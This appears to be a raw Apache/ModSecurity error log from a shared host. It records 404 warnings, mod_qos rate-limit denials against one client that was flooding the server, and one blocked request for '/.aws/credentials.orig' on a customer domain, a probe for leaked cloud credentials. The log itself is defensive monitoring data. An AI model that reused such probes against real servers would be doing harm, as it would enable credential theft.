[Tue May 26 19:54:31.378261 2026] [security2:error] [pid 86490:tid 86729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K_BQAAAPI"]
[Tue May 26 19:54:31.378775 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ7gAAAEA"]
[Tue May 26 19:54:31.381104 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JEQAAAdw"]
[Tue May 26 19:54:31.383123 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JEAAAAas"]
[Tue May 26 19:54:31.383823 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JFgAAAeo"]
[Tue May 26 19:54:31.386728 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHkqK9k_ZUB2Vp25JKgAAAZ4"]
[Tue May 26 19:54:31.389743 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JDwAAAfM"]
[Tue May 26 19:54:31.393745 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHkqK9k_ZUB2Vp25JKwAAAa4"]
[Tue May 26 19:54:31.398089 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHWDRMqfxdEDkoszQ4QAAAAs"]
[Tue May 26 19:54:31.421762 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHkqK9k_ZUB2Vp25JLAAAAb4"]
[Tue May 26 19:54:31.431561 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ8AAAAF8"]
[Tue May 26 19:54:31.436934 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ8gAAAFc"]
[Tue May 26 19:54:31.464970 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_bQAAAKw"]
[Tue May 26 19:54:31.549012 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtH1ZMwN0DpLVWo6K_ywAAAQE
[Tue May 26 19:54:31.550243 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtH1ZMwN0DpLVWo6K_zAAAAOA
[Tue May 26 19:54:31.550758 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtH1ZMwN0DpLVWo6K_zgAAAOQ
[Tue May 26 19:54:31.554098 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtH1ZMwN0DpLVWo6K_0gAAALU
[Tue May 26 19:54:31.567547 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtH1ZMwN0DpLVWo6K_0wAAAPI
[Tue May 26 19:54:31.570872 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtH1ZMwN0DpLVWo6K_2AAAAJw
[Tue May 26 19:54:31.583993 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_2wAAAMA
[Tue May 26 19:54:31.589660 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH2DRMqfxdEDkoszRIQAAADA
[Tue May 26 19:54:31.602057 2026] [security2:error] [pid 93576:tid 93728] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszRAgAAABA"]
[Tue May 26 19:54:31.637969 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_3wAAAK0
[Tue May 26 19:54:31.699923 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH2DRMqfxdEDkoszRIgAAAEs
[Tue May 26 19:54:31.703227 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH2DRMqfxdEDkoszRIwAAACs
[Tue May 26 19:54:31.705238 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_4AAAAPA
[Tue May 26 19:54:31.707156 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_4gAAAOQ
[Tue May 26 19:54:31.723539 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_5AAAAIY
[Tue May 26 19:54:31.724022 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_5QAAALU
[Tue May 26 19:54:31.744258 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_5gAAAPk
[Tue May 26 19:54:31.745418 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH2DRMqfxdEDkoszRJAAAAHY
[Tue May 26 19:54:31.790520 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_6gAAAK4
[Tue May 26 19:54:31.803301 2026] [security2:error] [pid 86490:tid 86686] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.aws/credentials.orig"] [unique_id "ahWtH1ZMwN0DpLVWo6K_6wAAAMc"]
[Tue May 26 19:54:31.849441 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH2DRMqfxdEDkoszRJQAAABE
[Tue May 26 19:54:31.854140 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH2DRMqfxdEDkoszRJgAAADo
[Tue May 26 19:54:31.858209 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_7AAAAJU
[Tue May 26 19:54:31.861416 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_7QAAANk
[Tue May 26 19:54:31.864784 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_7gAAALM
[Tue May 26 19:54:31.873993 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_8QAAAOw
[Tue May 26 19:54:31.878525 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_8gAAAI8
[Tue May 26 19:54:31.899339 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_8wAAAJw
[Tue May 26 19:54:31.899636 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH2DRMqfxdEDkoszRJwAAACU
[Tue May 26 19:54:31.946574 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_9AAAAOo
[Tue May 26 19:54:31.999464 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH2DRMqfxdEDkoszRKAAAABo
[Tue May 26 19:54:32.003574 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIGDRMqfxdEDkoszRKQAAAE4
[Tue May 26 19:54:32.009596 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6K_9gAAAL4
[Tue May 26 19:54:32.017373 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6K_9wAAAOU
[Tue May 26 19:54:32.022470 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6K_-AAAAPU
[Tue May 26 19:54:32.024699 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6K_-QAAAMA
[Tue May 26 19:54:32.030681 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6K_-gAAALE
[Tue May 26 19:54:32.051543 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6K_-wAAANM
[Tue May 26 19:54:32.051899 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIGDRMqfxdEDkoszRKgAAAB8
[Tue May 26 19:54:32.100615 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6K__AAAALg
[Tue May 26 19:54:32.150000 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIGDRMqfxdEDkoszRKwAAAGA
[Tue May 26 19:54:32.153138 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIGDRMqfxdEDkoszRLAAAAFQ
[Tue May 26 19:54:32.161792 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6K__gAAAOA
[Tue May 26 19:54:32.171482 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6K__wAAAPA
[Tue May 26 19:54:32.176487 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAAAAAAOQ
[Tue May 26 19:54:32.182566 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAAQAAALU
[Tue May 26 19:54:32.203348 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAAgAAAPg
[Tue May 26 19:54:32.207223 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIGDRMqfxdEDkoszRLQAAAHE
[Tue May 26 19:54:32.258814 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LABgAAANk
[Tue May 26 19:54:32.283264 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ8QAAACc"]
[Tue May 26 19:54:32.284306 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ8wAAAHQ"]
[Tue May 26 19:54:32.285290 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHkqK9k_ZUB2Vp25JMQAAAe0"]
[Tue May 26 19:54:32.289309 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_ZwAAAPY"]
[Tue May 26 19:54:32.289916 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_bwAAAM8"]
[Tue May 26 19:54:32.290311 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ9QAAAHc"]
[Tue May 26 19:54:32.298350 2026] [security2:error] [pid 86490:tid 86702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_WAAAANc"]
[Tue May 26 19:54:32.309544 2026] [security2:error] [pid 93868:tid 94372] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JOgAAAgE"]
[Tue May 26 19:54:32.312591 2026] [security2:error] [pid 86490:tid 86731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_agAAAPQ"]
[Tue May 26 19:54:32.328500 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ-QAAAFA"]
[Tue May 26 19:54:32.329846 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszRCgAAAAw"]
[Tue May 26 19:54:32.336669 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHkqK9k_ZUB2Vp25JMwAAAao"]
[Tue May 26 19:54:32.336937 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_eAAAAPo"]
[Tue May 26 19:54:32.337392 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszRAQAAAGs"]
[Tue May 26 19:54:32.342080 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_eQAAAN4"]
[Tue May 26 19:54:32.352451 2026] [security2:error] [pid 86490:tid 86722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_awAAAOs"]
[Tue May 26 19:54:32.354007 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_dgAAANE"]
[Tue May 26 19:54:32.366609 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ-AAAAEY"]
[Tue May 26 19:54:32.376944 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszRCQAAAAc"]
[Tue May 26 19:54:32.391684 2026] [security2:error] [pid 86490:tid 86644] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_WgAAAJ0"]
[Tue May 26 19:54:32.399071 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszRDAAAADg"]
[Tue May 26 19:54:32.399911 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszRFwAAAAA"]
[Tue May 26 19:54:32.406314 2026] [security2:error] [pid 86490:tid 86622] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_aAAAAIc"]
[Tue May 26 19:54:32.409131 2026] [security2:error] [pid 86490:tid 86631] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH1ZMwN0DpLVWo6K_hgAAAJA"]
[Tue May 26 19:54:32.411250 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHlZMwN0DpLVWo6K_bAAAAN0"]
[Tue May 26 19:54:32.415532 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszREQAAAHg"]
[Tue May 26 19:54:32.428435 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JOQAAAbY"]
